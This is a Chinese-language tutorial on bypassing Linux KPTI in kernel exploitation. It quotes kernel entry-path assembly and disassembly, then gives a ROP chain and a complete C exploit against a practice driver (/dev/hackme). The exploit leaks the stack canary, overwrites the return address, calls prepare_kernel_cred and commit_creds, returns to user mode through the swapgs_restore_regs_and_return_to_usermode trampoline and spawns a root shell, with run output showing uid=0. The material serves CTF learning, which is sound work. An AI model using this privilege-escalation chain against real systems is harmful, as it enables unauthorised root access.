KPTI描述内容摘录自ctf wiki
KPTI 机制最初的主要目的是为了缓解 KASLR 的绕过以及 CPU 侧信道攻击。
在 KPTI 机制中,内核态空间的内存和用户态空间的内存的隔离进一步得到了增强。
内核态中的页表包括用户空间内存的页表和内核空间内存的页表。
用户态的页表只包括用户空间内存的页表以及必要的内核空间内存的页表,如用于处理系统调用、中断等信息的内存。
在 x86_64 的 PTI 机制中,内核态的用户空间内存映射部分被全部标记为不可执行。也就是说,之前不具有 SMEP 特性的硬件,如果开启了 KPTI 保护,也具有了类似于 SMEP 的特性。此外,SMAP 模拟也可以以类似的方式引入,只是现在还没有引入。因此,在目前开启了 KPTI 保护的内核中,如果没有开启 SMAP 保护,那么内核仍然可以访问用户态空间的内存,只是不能跳转到用户态空间执行 Shellcode。
Linux 4.15 中引入了 KPTI 机制,并且该机制被反向移植到了 Linux 4.14.11,4.9.75,4.4.110。
通过SWITCH_TO_USER_CR3_STACK
宏实现从内核态页面
切换到用户态页面
.macro SWITCH_TO_USER_CR3_STACK scratch_reg:req
pushq %rax
SWITCH_TO_USER_CR3_NOSTACK scratch_reg=\scratch_reg scratch_reg2=%rax
popq %rax
.endm
.macro SWITCH_TO_USER_CR3_NOSTACK scratch_reg:req scratch_reg2:req
ALTERNATIVE "jmp .Lend_\@", "", X86_FEATURE_PTI
mov %cr3, \scratch_reg
ALTERNATIVE "jmp .Lwrcr3_\@", "", X86_FEATURE_PCID
/*
* Test if the ASID needs a flush.
*/
movq \scratch_reg, \scratch_reg2
andq $(0x7FF), \scratch_reg /* mask ASID */
bt \scratch_reg, THIS_CPU_user_pcid_flush_mask
jnc .Lnoflush_\@
/* Flush needed, clear the bit */
btr \scratch_reg, THIS_CPU_user_pcid_flush_mask
movq \scratch_reg2, \scratch_reg
jmp .Lwrcr3_pcid_\@
.Lnoflush_\@:
movq \scratch_reg2, \scratch_reg
SET_NOFLUSH_BIT \scratch_reg
.Lwrcr3_pcid_\@:
/* Flip the ASID to the user version */
orq $(PTI_USER_PCID_MASK), \scratch_reg
.Lwrcr3_\@:
/* Flip the PGD to the user version */
orq $(PTI_USER_PGTABLE_MASK), \scratch_reg
mov \scratch_reg, %cr3
.Lend_\@:
.endm
引用自arttnba3
众所周知 Linux 采用四级页表结构(PGD->PUD->PMD->PTE),而 CR3 控制寄存器用以存储当前的 PGD 的地址,因此在开启 KPTI 的情况下用户态与内核态之间的切换便涉及到 CR3 的切换,为了提高切换的速度,内核将内核空间的 PGD 与用户空间的 PGD 两张页全局目录表放在一段连续的内存中(两张表,一张一页4k,总计8k,内核空间的在低地址,用户空间的在高地址),这样只需要将 CR3 的第 13 位取反便能完成页表切换的操作
在系统调用、中断处理处使用(都需要从内核态切换到用户态),如下是省略的系统调用entry_SYSCALL_64
代码
SYM_CODE_START(entry_SYSCALL_64)
UNWIND_HINT_EMPTY
swapgs
[...]
cmpq $__USER_CS, CS(%rsp) /* CS must match SYSRET */
jne swapgs_restore_regs_and_return_to_usermode // 注意这里 <<<<<<<<<<<<<<<<<<<
movq R11(%rsp), %r11
cmpq %r11, EFLAGS(%rsp) /* R11 == RFLAGS */
jne swapgs_restore_regs_and_return_to_usermode // 注意这里 <<<<<<<<<<<<<<<<<<<
/* nothing to check for RSP */
cmpq $__USER_DS, SS(%rsp) /* SS must match SYSRET */
jne swapgs_restore_regs_and_return_to_usermode // 注意这里 <<<<<<<<<<<<<<<<<<<
[...]
SWITCH_TO_USER_CR3_STACK scratch_reg=%rdi // <<<<<<<<<<<<<<<<<<<< 通过这个宏 从内核态页面切换到用户态页面
popq %rdi
popq %rsp
USERGS_SYSRET64
SYM_CODE_END(entry_SYSCALL_64)
从代码可知,在系统调用结束,返回到用户态之前会调用SWITCH_TO_USER_CR3_STACK
切换页面
之后再调用如下指令返回到用户态
popq %rdi
popq %rsp
USERGS_SYSRET64
#define USERGS_SYSRET64 \
swapgs; \
sysretq;
由于SWITCH_TO_USER_CR3_STACK
是宏,在/proc/kallsyms
中不存在其符号地址,因此一般是先获取使用到该宏的函数地址,再加上SWITCH_TO_USER_CR3_STACK展开处的偏移作为rop的地址,进行利用
entry_SYSCALL_64
的地址,再通过反汇编工具找到entry_SYSCALL_64
中 SWITCH_TO_USER_CR3_STACK
展开开始处的地址,将该地址作为rop的一环entry_SYSCALL_64
内部利用SWITCH_TO_USER_CR3_STACK
,会自动执行到swapgs; sysretq
,需要在rop链中构造sysretq
切换到用户态是需要的内核栈
再看看entry_SYSCALL_64
的代码
SYM_CODE_START(entry_SYSCALL_64)
UNWIND_HINT_EMPTY
swapgs
[...]
cmpq $__USER_CS, CS(%rsp) /* CS must match SYSRET */
[1] jne swapgs_restore_regs_and_return_to_usermode // 注意这里 <<<<<<<<<<<<<<<<<<<
movq R11(%rsp), %r11
cmpq %r11, EFLAGS(%rsp) /* R11 == RFLAGS */
[1] jne swapgs_restore_regs_and_return_to_usermode // 注意这里 <<<<<<<<<<<<<<<<<<<
/* nothing to check for RSP */
cmpq $__USER_DS, SS(%rsp) /* SS must match SYSRET */
[1] jne swapgs_restore_regs_and_return_to_usermode // 注意这里 <<<<<<<<<<<<<<<<<<<
[...]
[2] SWITCH_TO_USER_CR3_STACK scratch_reg=%rdi // <<<<<<<<<<<<<<<<<<<< 通过这个宏 从内核态页面切换到用户态页面
popq %rdi
popq %rsp
USERGS_SYSRET64
SYM_CODE_END(entry_SYSCALL_64)
如果系统调用不出什么意外,是通过【2】处的代码从内核态页面切换到用户态页面
在执行检测不符合检测时,是通过swapgs_restore_regs_and_return_to_usermode
函数返回到用户态:其中包含了页面切换,swapgs,iretq
SYM_INNER_LABEL(swapgs_restore_regs_and_return_to_usermode, SYM_L_GLOBAL)
#ifdef CONFIG_DEBUG_ENTRY
/* Assert that pt_regs indicates user mode. */
testb $3, CS(%rsp)
jnz 1f
ud2
1:
#endif
POP_REGS pop_rdi=0
/*
* The stack is now user RDI, orig_ax, RIP, CS, EFLAGS, RSP, SS.
* Save old stack pointer and switch to trampoline stack.
*/
movq %rsp, %rdi
movq PER_CPU_VAR(cpu_tss_rw + TSS_sp0), %rsp
UNWIND_HINT_EMPTY
/* Copy the IRET frame to the trampoline stack. */
pushq 6*8(%rdi) /* SS */
pushq 5*8(%rdi) /* RSP */
pushq 4*8(%rdi) /* EFLAGS */
pushq 3*8(%rdi) /* CS */
pushq 2*8(%rdi) /* RIP */
/* Push user RDI on the trampoline stack. */
pushq (%rdi)
/*
* We are on the trampoline stack. All regs except RDI are live.
* We can do future final exit work right here.
*/
STACKLEAK_ERASE_NOCLOBBER
SWITCH_TO_USER_CR3_STACK scratch_reg=%rdi // <<<<<<<<<<<<<<<<<<<< 通过这个宏 从内核态页面切换到用户态页面
/* Restore RDI. */
popq %rdi
SWAPGS
INTERRUPT_RETURN // <<<<<<<<<<<<<<<<<<<< iretq
#define INTERRUPT_RETURN iretq
大佬们说,通过反汇编才能看到细节
先找到swapgs_restore_regs_and_return_to_usermode的地址
/ # cat /proc/kallsyms | grep "swapgs_restore_regs_and_return_to_usermode"
ffffffff81200f10 T swapgs_restore_regs_and_return_to_usermode
.text:FFFFFFFF81200F10
.text:FFFFFFFF81200F10 pop r15 【1】<< swapgs_restore_regs_and_return_to_usermode起始位置
.text:FFFFFFFF81200F12 pop r14
.text:FFFFFFFF81200F14 pop r13
.text:FFFFFFFF81200F16 pop r12
.text:FFFFFFFF81200F18 pop rbp
.text:FFFFFFFF81200F19 pop rbx
.text:FFFFFFFF81200F1A pop r11
.text:FFFFFFFF81200F1C pop r10
.text:FFFFFFFF81200F1E pop r9
.text:FFFFFFFF81200F20 pop r8
.text:FFFFFFFF81200F22 pop rax
.text:FFFFFFFF81200F23 pop rcx
.text:FFFFFFFF81200F24 pop rdx
.text:FFFFFFFF81200F25 pop rsi
.text:FFFFFFFF81200F26 mov rdi, rsp 【2】<< 由于pop较多,会增加rop的长度,一般从这里利用,距离起始位置22
.text:FFFFFFFF81200F29 mov rsp, qword ptr gs:unk_6004
.text:FFFFFFFF81200F32 push qword ptr [rdi+30h]
.text:FFFFFFFF81200F35 push qword ptr [rdi+28h]
.text:FFFFFFFF81200F38 push qword ptr [rdi+20h]
.text:FFFFFFFF81200F3B push qword ptr [rdi+18h]
.text:FFFFFFFF81200F3E push qword ptr [rdi+10h]
.text:FFFFFFFF81200F41 push qword ptr [rdi]
.text:FFFFFFFF81200F43 push rax
.text:FFFFFFFF81200F44 jmp short loc_FFFFFFFF81200F89 【3】
[...]
[...]
.text:FFFFFFFF81200F89 loc_FFFFFFFF81200F89:
.text:FFFFFFFF81200F89 pop rax 【3】还需要弹出两个内容
.text:FFFFFFFF81200F8A pop rdi
.text:FFFFFFFF81200F8B call cs:off_FFFFFFFF82040088 【4】swapgs
.text:FFFFFFFF81200F91 jmp cs:off_FFFFFFFF82040080 【5】iretq
pop rdi; ret;
0
prepare_kernel_cred
mov rdi, rax; ret;
commit_creds
swapgs_restore_regs_and_return_to_usermode + 22
0
0
user_rip
user_cs
user_rflags
user_sp
user_ss
由于iretq
返回到用户态时内核栈布局比sysretq
简单,一般是使用swapgs_restore_regs_and_return_to_usermode
绕过KPTI
启用kpit
#!/bin/sh
qemu-system-x86_64 \
-m 1024M \
-cpu kvm64,+smep,+smap \
-kernel vmlinuz \
-initrd initramfs.cpio.gz \
-hdb flag.txt \
-snapshot \
-nographic \
-monitor /dev/null \
-no-reboot \
-append "console=ttyS0 nokaslr quiet panic=1"
先执行绕过smep的exp,段错误
/ $ ./04_exploit_bypass_smep
[+] successfully opened /dev/hackme
[*] trying to leak up to 320 bytes memory
[+] found stack canary: 0x7ae17b2ee0e55b00 @ index 16
[*] saving user land state
[*] trying to overwrite return address with ROP chain
Segmentation fault
/ $
将exp中的rop修改为如下内容
payload[cookie_off++] = cookie;
payload[cookie_off++] = 0x0;
payload[cookie_off++] = 0x0;
payload[cookie_off++] = 0x0;
payload[cookie_off++] = pop_rdi_ret; // return address
payload[cookie_off++] = 0x0;
payload[cookie_off++] = prepare_kernel_cred;
payload[cookie_off++] = mov_rdi_rax_clobber_rsi140_pop1_ret;
payload[cookie_off++] = 0x0;
payload[cookie_off++] = commit_creds;
payload[cookie_off++] = swapgs_restore_regs_and_return_to_usermode + 22; // 开始时有很多无用的pop指令,我们只需要回到那些pop指令之后的偏移量
payload[cookie_off++] = 0x0;
payload[cookie_off++] = 0x0;
payload[cookie_off++] = user_rip;
payload[cookie_off++] = user_cs;
payload[cookie_off++] = user_rflags;
payload[cookie_off++] = user_sp;
payload[cookie_off++] = user_ss;
结果如下
/ $ ./05_exploit_bypass_kpti_with_trampoline
[+] successfully opened /dev/hackme
[*] trying to leak up to 320 bytes memory
[+] found stack canary: 0x25ed2c3e73fecd00 @ index 16
[*] saving user land state
[*] trying to run ROP chain and bypass KPTI with trampoline
[+] returned to user land
[+] got root (uid = 0)
[*] spawning shell
/ # id
uid=0 gid=0
完整exp
#include
#include
#include
#include
#include
#include
char *VULN_DRV = "/dev/hackme";
void spawn_shell();
int64_t global_fd = 0;
uint64_t cookie = 0;
uint8_t cookie_off = 16;
uint64_t user_cs, user_ss, user_rflags, user_sp;
uint64_t user_rip = (uint64_t) spawn_shell;
uint64_t prepare_kernel_cred = 0xffffffff814c67f0;
uint64_t commit_creds = 0xffffffff814c6410;
uint64_t pop_rdi_ret = 0xffffffff815f88ec;
uint64_t mov_rdi_rax_clobber_rsi140_pop1_ret = 0xffffffff816bf203;
uint64_t swapgs_restore_regs_and_return_to_usermode = 0xffffffff81200f10;
void open_dev() {
global_fd = open(VULN_DRV, O_RDWR);
if (global_fd < 0) {
printf("[!] failed to open %s\n", VULN_DRV);
exit(-1);
} else {
printf("[+] successfully opened %s\n", VULN_DRV);
}
}
void leak_cookie() {
uint8_t sz = 40;
uint64_t leak[sz];
printf("[*] trying to leak up to %ld bytes memory\n", sizeof(leak));
uint64_t data = read(global_fd, leak, sizeof(leak));
cookie = leak[cookie_off];
printf("[+] found stack canary: 0x%lx @ index %d\n", cookie, cookie_off);
if(!cookie) {
puts("[-] failed to leak stack canary!");
exit(-1);
}
}
void spawn_shell() {
puts("[+] returned to user land");
uid_t uid = getuid();
if (uid == 0) {
printf("[+] got root (uid = %d)\n", uid);
} else {
printf("[!] failed to get root (uid: %d)\n", uid);
exit(-1);
}
puts("[*] spawning shell");
system("/bin/sh");
exit(0);
}
void save_userland_state() {
puts("[*] saving user land state");
__asm__(".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax");
}
void overwrite_ret() {
puts("[*] trying to run ROP chain and bypass KPTI with trampoline");
uint8_t sz = 35;
uint64_t payload[sz];
payload[cookie_off++] = cookie;
payload[cookie_off++] = 0x0;
payload[cookie_off++] = 0x0;
payload[cookie_off++] = 0x0;
payload[cookie_off++] = pop_rdi_ret; // return address
payload[cookie_off++] = 0x0;
payload[cookie_off++] = prepare_kernel_cred;
payload[cookie_off++] = mov_rdi_rax_clobber_rsi140_pop1_ret;
payload[cookie_off++] = 0x0;
payload[cookie_off++] = commit_creds;
payload[cookie_off++] = swapgs_restore_regs_and_return_to_usermode + 22; // 开始时有很多无用的pop指令,我们只需要回到那些pop指令之后的偏移量
payload[cookie_off++] = 0x0;
payload[cookie_off++] = 0x0;
payload[cookie_off++] = user_rip;
payload[cookie_off++] = user_cs;
payload[cookie_off++] = user_rflags;
payload[cookie_off++] = user_sp;
payload[cookie_off++] = user_ss;
uint64_t data = write(global_fd, payload, sizeof(payload));
puts("[-] if you can read this we failed the mission :(");
}
int main(int argc, char **argv) {
open_dev();
leak_cookie();
save_userland_state();
overwrite_ret();
return 0;
}
https://breaking-bits.gitbook.io/breaking-bits/exploit-development/linux-kernel-exploit-development/kernel-page-table-isolation-kpti
https://github.com/torvalds/linux/blob/7587a4a5a4f66293e13358285bcbc90cc9bddb31/arch/x86/entry/entry_64.S#L575
https://ctf-wiki.org/pwn/linux/kernel-mode/defense/isolation/user-kernel/kpti/#switch_to_user_cr3_stack
https://github.com/pr0cf5/kernel-exploit-practice/tree/master/bypass-smep#bypassing-smepkpti-via-rop
https://0x434b.dev/dabbling-with-linux-kernel-exploitation-ctf-challenges-to-learn-the-ropes/#version-1-trampoline-goes-weeeh